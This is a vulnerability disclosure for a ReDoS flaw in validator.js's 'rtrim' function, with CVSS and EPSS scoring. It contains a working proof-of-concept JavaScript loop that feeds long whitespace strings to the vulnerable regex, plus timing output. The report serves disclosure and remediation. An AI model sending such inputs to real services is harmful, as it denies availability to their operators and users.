YetingliC37E975C-21A3-4C5F-9B57-04D63B28CFC9Inefficient Regular Expression Complexity in validatorjs/validator.js
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.001 Low
EPSS
Percentile
37.1%
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.
It allows cause a denial of service when calling function ‘rtrim’.
The ReDoS vulnerability is mainly due to the regex /(\s)+$/g and can be exploited with the following code.
Proof of Concept
// PoC.js
var validator = require("validator")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = 'a'+' '.repeat(i*10000)+"a";
validator.rtrim(attack_str);
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The Output
"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"
Reference
I have opened an issue before, but it is still not safe after fix.
For repair, you can refer to the rtrim function in package trim
Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.001 Low
EPSS
Percentile
37.1%